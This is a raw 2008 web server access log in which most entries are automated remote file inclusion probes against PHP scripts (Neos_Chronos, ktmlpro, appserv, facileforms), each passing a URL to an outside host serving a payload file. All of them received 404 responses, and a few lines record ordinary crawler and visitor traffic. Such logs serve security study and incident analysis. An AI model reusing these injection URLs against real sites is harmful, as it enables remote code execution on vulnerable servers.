88.212.200.189 - - [24/Jun/2008:20:54:28 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
88.212.200.189 - - [24/Jun/2008:20:54:28 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
213.214.0.132 - - [24/Jun/2008:20:54:40 -0500] "GET /logs/book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:20:54:40 -0500] "GET /book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
140.123.104.159 - - [24/Jun/2008:20:54:57 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
140.123.104.159 - - [24/Jun/2008:20:54:58 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
202.53.78.212 - - [24/Jun/2008:20:57:16 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
202.53.78.212 - - [24/Jun/2008:20:57:16 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
219.154.22.244 - - [24/Jun/2008:20:57:24 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
219.154.22.244 - - [24/Jun/2008:20:57:25 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
72.29.75.39 - - [24/Jun/2008:20:59:24 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:59:24 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
67.205.74.80 - - [24/Jun/2008:21:00:22 -0500] "GET /logs/bughttp://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
67.205.74.80 - - [24/Jun/2008:21:00:22 -0500] "GET /bughttp://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
208.98.1.12 - - [24/Jun/2008:21:02:12 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
219.93.96.46 - - [24/Jun/2008:21:02:32 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
219.93.96.46 - - [24/Jun/2008:21:02:33 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
74.55.113.226 - - [24/Jun/2008:21:03:48 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
74.55.113.226 - - [24/Jun/2008:21:03:48 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.118.118.156 - - [24/Jun/2008:21:04:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.118.118.156 - - [24/Jun/2008:21:04:55 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
88.212.200.189 - - [24/Jun/2008:21:05:21 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r83%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu.o9omFIj3IAni5XNyoA;_ylu=X3oDMTB0NzFmM3FxBHNlYwNzcgRwb3MDOTgzBGNvbG8DYWMyBHZ0aWQD/SIG=11h3nobsh/EXP=1214444477/**http%3a/hiperlink.com.pl/hoepl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.79"
88.212.200.189 - - [24/Jun/2008:21:05:21 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
88.212.200.189 - - [24/Jun/2008:21:05:22 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r83%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu.o9omFIj3IAni5XNyoA;_ylu=X3oDMTB0NzFmM3FxBHNlYwNzcgRwb3MDOTgzBGNvbG8DYWMyBHZ0aWQD/SIG=11h3nobsh/EXP=1214444477/**http%3a/hiperlink.com.pl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.79"
216.99.193.134 - - [24/Jun/2008:21:05:23 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
216.99.193.134 - - [24/Jun/2008:21:05:23 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
77.221.157.210 - - [24/Jun/2008:21:05:58 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
74.6.8.113 - - [24/Jun/2008:21:06:20 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.113 - - [24/Jun/2008:21:06:22 -0500] "GET /logs/access_log.1197849600 HTTP/1.0" 200 211511 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.109.19.217 - - [24/Jun/2008:21:07:02 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
217.109.19.217 - - [24/Jun/2008:21:07:04 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
217.109.19.217 - - [24/Jun/2008:21:07:24 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
217.109.19.217 - - [24/Jun/2008:21:07:25 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
200.11.67.242 - - [24/Jun/2008:21:08:13 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
70.84.164.38 - - [24/Jun/2008:21:08:50 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
70.84.164.38 - - [24/Jun/2008:21:08:50 -0500] "GET //appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
70.84.164.38 - - [24/Jun/2008:21:08:50 -0500] "GET /logs//appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
201.245.12.66 - - [24/Jun/2008:21:09:34 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
201.245.12.66 - - [24/Jun/2008:21:09:34 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
59.120.32.19 - - [24/Jun/2008:21:10:20 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
59.120.32.19 - - [24/Jun/2008:21:10:20 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
59.120.32.19 - - [24/Jun/2008:21:10:21 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
59.120.32.19 - - [24/Jun/2008:21:10:21 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
59.120.32.19 - - [24/Jun/2008:21:11:54 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
201.245.12.66 - - [24/Jun/2008:21:12:16 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r83%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7o.omFIBH8AwBRXNyoA;_ylu=X3oDMTB0NzFmM3FxBHNlYwNzcgRwb3MDOTgzBGNvbG8DYWMyBHZ0aWQD/SIG=11hsgjift/EXP=1214444478/**http%3a/hiperlink.com.pl/hoepl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.76"
201.245.12.66 - - [24/Jun/2008:21:12:17 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
201.245.12.66 - - [24/Jun/2008:21:12:17 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r83%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7o.omFIBH8AwBRXNyoA;_ylu=X3oDMTB0NzFmM3FxBHNlYwNzcgRwb3MDOTgzBGNvbG8DYWMyBHZ0aWQD/SIG=11hsgjift/EXP=1214444478/**http%3a/hiperlink.com.pl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.76"
209.90.77.34 - - [24/Jun/2008:21:14:22 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
209.90.77.34 - - [24/Jun/2008:21:14:22 -0500] "GET //appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
209.90.77.34 - - [24/Jun/2008:21:14:22 -0500] "GET /logs//appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
201.17.3.26 - - [24/Jun/2008:21:15:56 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
201.17.3.26 - - [24/Jun/2008:21:16:00 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
213.214.0.132 - - [24/Jun/2008:21:16:37 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:21:16:37 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
140.123.104.159 - - [24/Jun/2008:21:18:21 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r76%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkkNFomFIvB8B_lFXNyoA;_ylu=X3oDMTB0MjNvaXN0BHNlYwNzcgRwb3MDOTc2BGNvbG8Dc2sxBHZ0aWQD/SIG=11h5o6f7n/EXP=1214444485/**http%3a/hiperlink.com.pl/hoepl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.79"
140.123.104.159 - - [24/Jun/2008:21:18:21 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
140.123.104.159 - - [24/Jun/2008:21:18:22 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r76%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkkNFomFIvB8B_lFXNyoA;_ylu=X3oDMTB0MjNvaXN0BHNlYwNzcgRwb3MDOTc2BGNvbG8Dc2sxBHZ0aWQD/SIG=11h5o6f7n/EXP=1214444485/**http%3a/hiperlink.com.pl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.79"
217.109.19.217 - - [24/Jun/2008:21:19:04 -0500] "GET /logs/facileforms.frame.php?ff_compath=index.php?option=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
217.109.19.217 - - [24/Jun/2008:21:19:06 -0500] "GET /facileforms.frame.php?ff_compath=index.php?option=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
217.109.19.217 - - [24/Jun/2008:21:20:02 -0500] "GET /logs/facileforms.frame.php?ff_compath=index.php?option=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
217.109.19.217 - - [24/Jun/2008:21:20:04 -0500] "GET /facileforms.frame.php?ff_compath=index.php?option=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
219.154.22.244 - - [24/Jun/2008:21:21:20 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r76%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkxJFomFIC5EAehZXNyoA;_ylu=X3oDMTB0MjNvaXN0BHNlYwNzcgRwb3MDOTc2BGNvbG8Dc2sxBHZ0aWQD/SIG=11h5o6f7n/EXP=1214444485/**http%3a/hiperlink.com.pl/hoepl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.65"
219.154.22.244 - - [24/Jun/2008:21:21:21 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
219.154.22.244 - - [24/Jun/2008:21:21:21 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r76%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkxJFomFIC5EAehZXNyoA;_ylu=X3oDMTB0MjNvaXN0BHNlYwNzcgRwb3MDOTc2BGNvbG8Dc2sxBHZ0aWQD/SIG=11h5o6f7n/EXP=1214444485/**http%3a/hiperlink.com.pl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.65"
201.217.93.91 - - [24/Jun/2008:21:23:02 -0500] "GET /logs/access_log.1207785600/appserv/main.php?appserv_root=http://dinosoft.sbuyzone.com/help/css/id?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
201.217.93.91 - - [24/Jun/2008:21:23:02 -0500] "GET /appserv/main.php?appserv_root=http://dinosoft.sbuyzone.com/help/css/id?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
201.217.93.91 - - [24/Jun/2008:21:23:03 -0500] "GET /logs/appserv/main.php?appserv_root=http://dinosoft.sbuyzone.com/help/css/id?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
133.9.4.11 - - [24/Jun/2008:21:23:24 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:23:25 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:23:25 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:23:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:23:25 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:23:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:23:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:23:35 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:23:35 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
85.25.86.64 - - [24/Jun/2008:21:23:44 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://xdedzx.com/xdedzx/id2.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
85.25.86.64 - - [24/Jun/2008:21:23:44 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://xdedzx.com/xdedzx/id2.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
133.9.4.11 - - [24/Jun/2008:21:23:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:23:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
